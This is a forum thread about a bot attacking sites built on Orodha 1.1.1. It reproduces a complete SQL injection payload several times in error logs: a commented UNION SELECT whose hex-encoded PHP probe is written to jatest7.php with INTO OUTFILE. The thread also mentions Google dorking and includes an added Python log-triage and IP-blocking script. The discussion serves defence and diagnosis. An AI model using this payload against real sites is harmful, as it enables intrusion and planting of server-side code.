
Orodha 1.1.1 attacked

In the last 2 days, all sites we have made with Orodha 1.1.1 were attacked.

Only one site with SQL queries

Query String: select_users_lang=en%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2Fnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C0x6A7573745F615F746573745F34355F73696E676C655F305F736C6173685F315F3C3F706870206563686F286D643528226A7573745F615F746573742229293B6563686F2840756E6C696E6B28222F6A6174657374372E7068702229203F2022756E222E226C696E6B656422203A20226E6F745F756E222E226C696E6B656422293F3E%2F%2A%2A%2Finto%2F%2A%2A%2Foutfile%2F%2A%2A%2F%27%2Fjatest7.php%27%2F%2A

Attacked 1500 times by the IP 121.254.168.16.

The error we receive is:

Crashed by User at IP --> 121.254.168.16 ON March 15, 2012, 1:46:13 am

SQL Error Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,n' at line 1

SQL statement that failed below:

---------------------------------------------------------

SELECT pagesmain_title FROM altra_en'/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0x6A7573745F615F746573745F34355F73696E676C655F305F736C6173685F315F3C3F706870206563686F286D643528226A7573745F615F746573742229293B6563686F2840756E6C696E6B28222F6A6174657374372E7068702229203F2022756E222E226C696E6B656422203A20226E6F745F756E222E226C696E6B656422293F3E/**/into/**/outfile/**/'/jatest7.php'/*_pagesmain WHERE pagesmain_id='3'



---------------------------------------------------------



ERROR REPORT domain.net: March 15, 2012, 1:46:13 am



---------------------------------------------------------

Server Type: Apache/2.2.3 (CentOS)

Request Method: GET

Query String: select_users_lang=en%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2Fnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C0x6A7573745F615F746573745F34355F73696E676C655F305F736C6173685F315F3C3F706870206563686F286D643528226A7573745F615F746573742229293B6563686F2840756E6C696E6B28222F6A6174657374372E7068702229203F2022756E222E226C696E6B656422203A20226E6F745F756E222E226C696E6B656422293F3E%2F%2A%2A%2Finto%2F%2A%2A%2Foutfile%2F%2A%2A%2F%27%2Fjatest7.php%27%2F%2A

User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)

Request URI: /index.html?select_users_lang=en%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2Fnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C0x6A7573745F615F746573745F34355F73696E676C655F305F736C6173685F315F3C3F706870206563686F286D643528226A7573745F615F746573742229293B6563686F2840756E6C696E6B28222F6A6174657374372E7068702229203F2022756E222E226C696E6B656422203A20226E6F745F756E222E226C696E6B656422293F3E%2F%2A%2A%2Finto%2F%2A%2A%2Foutfile%2F%2A%2A%2F%27%2Fjatest7.php%27%2F%2A

POST Variables: array (
)

GET Variables: array (
  'select_users_lang' => 'en\'/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0x6A7573745F615F746573745F34355F73696E676C655F305F736C6173685F315F3C3F706870206563686F286D643528226A7573745F615F746573742229293B6563686F2840756E6C696E6B28222F6A6174657374372E7068702229203F2022756E222E226C696E6B656422203A20226E6F745F756E222E226C696E6B656422293F3E/**/into/**/outfile/**/\'/jatest7.php\'/*',
  'printer_friendly' => false,
  'action' => 'index',
  'PageID' => 1,
)

orodhamaniak

Re: Orodha 1.1.1 attacked

I'm no expert on the subject, but it looks like an SQL injection attack where a hacker is trying to dump the contents of the users table into a file called jatest7.php.

Search your website and look for the file jatest7.php. If it's there I would download it and see if they were successful in obtaining the user data before I deleted it from the server.

Since all of the attacks are coming from the same IP address I would also block that IP using my Firewall settings or in the htaccess file.

If you decode the hexadecimal to string you get this:

Code:

?just_a_test_45_single_0_slash_1_<?php echo(md5("just_a_test"));echo(@unlink("/jatest7.php") ? "un"."linked" : "not_un"."linked")?>

Now that I look at that I think the UNLINK deletes the jatest7.php file if it was created.

Look in your user database to see if there is a username "just_a_test". If it's there you need to delete it. But if I was you and did find it I would look at the settings for that user and see if they were able to give themselves admin privileges.

skosloff
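As an added example (not code from the thread or from Orodha), the script below does by hand what the two posts above did: it URL-decodes the request, strips the /**/ comment padding, flags the UNION SELECT ... INTO OUTFILE pattern, decodes the 0x hex literal to show the text that would have been written to jatest7.php, counts hits per source IP and renders Apache 2.2 Deny lines for .htaccess. The log lines are constructed, modelled on the request in the first post with the null list and hex literal shortened; the threshold and log format are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log lines: "<ip> "GET <uri> HTTP/1.1" <status>".
# First line mirrors the thread's request (null list and hex shortened);
# the hex literal decodes to a tiny PHP probe, as the real one did.
SAMPLE_LOG = """\
121.254.168.16 "GET /index.html?select_users_lang=en%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2Fnull%2Cnull%2C0x3C3F706870206563686F2831293B3F3E%2F%2A%2A%2Finto%2F%2A%2A%2Foutfile%2F%2A%2A%2F%27%2Fjatest7.php%27%2F%2A HTTP/1.1" 500
121.254.168.16 "GET /index.html?select_users_lang=en%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2Fnull HTTP/1.1" 500
203.0.113.7 "GET /index.html?select_users_lang=en&action=index&PageID=1 HTTP/1.1" 200
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) "GET (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d+)')
HEX_RE = re.compile(r"0x([0-9A-Fa-f]+)")
INDICATORS = {  # checked after normalisation, so /**/ padding cannot hide them
    "union_select": re.compile(r"\bunion\s+select\b"),
    "into_outfile": re.compile(r"\binto\s+outfile\b"),
}


def normalise(uri: str) -> str:
    """URL-decode, replace inline /* ... */ comments with a space, lowercase."""
    decoded = unquote_plus(uri)
    return re.sub(r"/\*.*?\*/", " ", decoded).lower()


def decode_hex_literals(sql: str) -> list:
    """MySQL 0x... literals smuggle text without quotes; recover it for review."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_RE.findall(sql) if len(h) % 2 == 0]


def triage(log_text: str) -> dict:
    """Return flagged requests with their indicators, plus a per-IP hit count."""
    hits, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        sql = normalise(m["uri"])
        found = [name for name, rx in INDICATORS.items() if rx.search(sql)]
        if not found:
            continue
        per_ip[m["ip"]] += 1
        hits.append({"ip": m["ip"], "indicators": found, "payload_text": decode_hex_literals(sql)})
    return {"hits": hits, "per_ip": per_ip}


def htaccess_deny(per_ip: Counter, threshold: int = 10) -> str:
    """Apache 2.2 (the server type in the error report) .htaccess block for noisy IPs."""
    lines = ["Order Allow,Deny", "Allow from all"]
    lines += [f"Deny from {ip}" for ip, n in sorted(per_ip.items()) if n >= threshold]
    return "\n".join(lines)
```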

Re: Orodha 1.1.1 attacked

Yes, it is an attack. It forced me to close down one of my sites. I hope someone can find a way to close these ***** out.

cheers,

simon132

Re: Orodha 1.1.1 attacked

simon132 wrote:

Yes, it is an attack. It forced me to close down one of my sites. I hope someone can find a way to close these ***** out.

cheers,

Remember, the problem is not Orodha. This is a standard attack on PHP sites looking for vulnerabilities to get into the database. From what was posted above it does not look like they got to the database.

If you see the IP address is consistent just block that IP address. Most of these hackers don't even use proxy servers anymore.

skosloff

Re: Orodha 1.1.1 attacked

The attacks stopped in the last 24 hours.
The attacks on one site were from IP 88.43.235.239,
and on the other from IP 121.254.168.16.
The site does not destroy them.
The file jatest7.php does not exist on the site.
Something must be done to prevent this.

orodhamaniak

Re: Orodha 1.1.1 attacked

orodhamaniak wrote:

The attacks stopped in the last 24 hours. The site does not destroy them.

I don't know what that means.

orodhamaniak wrote:

Something must be done to prevent this.

You can block IP's or set up a honeypot to try and trap those kinds of events. Other than that, how do you prevent someone or a bot from visiting your web site? Orodha can't do that. You have to set the traps of the IP filters.

Did they manage to successfully add their user to the database? Even if you don't see a new user, look through the Orodha site log to see if they created a user then deleted it.

You should also talk to your web host about preventing attacks on your sites. If you are using a shared hosting service they might not do much for you. But if you lease your own server they might provide some decent help.

Hack attacks just plain suck. We have dozens of sites and see hack attempts all of the time. We use some honeypot trapping techniques on most sites, plus we outright ban blocks of IP addresses. Yes, I realize some people are strongly against doing things like that. But places like China, Russia, North Korea, and the Baltic States are not our intended audience - especially China. I don't have a guilty conscience blocking those IP's.

If your database was hacked then it proves Orodha is vulnerable and needs to be locked down better to prevent those types of attacks. But I don't think their hack was successful. They were just using a bot to randomly test for vulnerabilities.

skosloff

Re: Orodha 1.1.1 attacked

I think these lamers may find Orodha sites using Google search (such as inurl:?action=view_agents), so if Orodha users change these URLs they may not find Orodha sites so easily.

emlakcilik

Re: Orodha 1.1.1 attacked

I've had the same type of attacks for over six months on my Joomla and Orodha sites. They have tried to use server environments to use my sendmail for spam.
None have damaged or taken down any of our sites or hacked the database. My only solution has been to block IPs with the htaccess file. I gave up trying to block a single IP. Now I block the whole range. Most of the attacks are from China or Europe.

If you are using Joomla, try some of the login failure modules which send you an email with the user name and IP address when someone tries to log in and it fails. While it had some security problems, User Trace for Joomla was a great module for checking visitors. It would be a great type of addon for Orodha!

Charlie

RECS

Re: Orodha 1.1.1 attacked

RECS wrote:

I've had the same type of attacks for over six months on my Joomla and Orodha sites. They have tried to use server environments to use my sendmail for spam.

With a Joomla site I suggest using something like sh404SEF. Not only is it a nice tool for SEF URL's and a host of other features, but it also helps fend off some basic spammer attacks.

skosloff

Re: Orodha 1.1.1 attacked

Hack Attempts!

I just sat and watched someone trying to hack my site with a brute force attack. If you are using the default user name or any part of it, you should change it immediately.
600 attempts in just a few seconds using the default user name and random numbers and names. I shut down the site to stop the attacks.
Last week the hack attempts were dealing with phpadmin on the server.

Charlie

RECS
